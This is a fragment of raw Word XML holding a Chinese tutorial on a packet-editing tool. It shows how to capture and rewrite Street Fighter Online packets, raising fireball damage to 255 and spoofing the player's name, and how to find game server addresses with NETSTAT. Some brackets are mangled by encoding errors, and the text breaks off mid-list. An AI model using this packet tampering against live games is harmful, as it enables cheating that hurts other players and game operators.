          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在启动状态时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的按钮会呈现红色。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，您随时可以关闭这个视窗。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会保留在原来的状态，直到您再按一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> on / off </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钮。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用钮在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的状态下，才可以勾选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前的方框来编辑修改。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您想编辑某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要双击该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的名字即可。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NORMAL MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　范例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　当您在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Street Fighter Online </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>﹝快打旋风线上版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏中，您使用了两次火球而且击中了对方，这时您会撷取到以下的封包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEND-&gt; 0000 08 14 21 06 01 04 SEND-&gt; 0000 02 09 87 00 67 FF A4 AA 11 22 00 00 00 00 SEND-&gt; 0000 03 84 11 09 11 09 SEND-&gt; 0000 0A 09 C1 10 00 00 FF 52 44 SEND-&gt; 0000 0A 09 C1 10 00 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 66 52 44 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　您的第一个火球让对方减了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滴﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16 = 10h?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的生命值，而您观察到第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个封包的位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值出现，应该就是这里了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　您观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0A 09 C1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在两个封包中都没改变，可见得这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个数值是发出火球的关键。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　因此您将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0A 09 C1 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填在搜寻列﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEARCH?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后在修改列﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MODIFY?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如此一来，当您再度发出火球时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会取代之前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是攻击力为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的火球了！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADVANCED MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　范例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您在一个游戏中，您不想要用真实姓名，您想用修改过的假名传送给对方。在您使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，您会发现有些封包里面有您的名字出现。假设您的名字是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，换算成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进位则是﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>53 68 61 64 6F 77?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；而您打算用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>moon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6D 6F 6F 6E 20 20?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来取代他。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1) SEND-&gt; 0000 08 14 21 06 01 042) SEND-&gt; 0000 01 06 99 53 68 61 64 6F 77 00 01 05 3) SEND-&gt; 0000 03 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">84 11 09 11 094) SEND-&gt; 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11 5) SEND-&gt; 0000 0A 09 C1 10 00 00 66 52 44 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　但是您仔细看，您的名字在每个封包中并不是出现在相同的位置上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个封包里，名字是出现在第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个位置上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个封包里，名字是出现在第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个位置上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在这种情况下，您就需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ADVANCED MODE- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您在搜寻列﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEARCH?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填上：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">53 68 61 64 6F 77 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>﹝请务必从位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始填</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">?#123;- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您想要从原来名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第一个字母开始置换新名字，因此您要选择从数值被发现的位置开始替代连续数值﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from the position of the chain found?#123;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在，在修改列﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MODIFY?#123;000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置填上：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6D 6F 6F 6E 20 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>﹝此为相对应位置，也就是从原来搜寻栏的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置开始递换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">?#123;- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您想从封包的第一个位置就修改数值，请选择﹝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">from the beginning of the packet?#123; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　了解一点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议常识的人都知道，互联网是将信息数据打包之后再传送出去的。每个数据包分为头部信息和数据信息两部分。头部信息包括数据包的发送地址和到达地址等。数据信息包括我们在游戏中相关操作的各项信息。那么在做截获封包的过程之前我们先要知道游戏服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和端口号等各种信息，实际上最简单的是看看我们游戏目录下，是否有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SERVER.INI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置文件，这个文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件里你可以查看到个游戏服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，比如金庸群侠传就是如此，那么除了这个我们还可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NETSTAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个命令，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NETSTAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。或者你可以使用木马客星等工具来查看网络连接。工具是很多的，看你喜欢用哪一种了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NETSTAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的一般格式为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NETSTAT [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　命令中各选项的含义如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
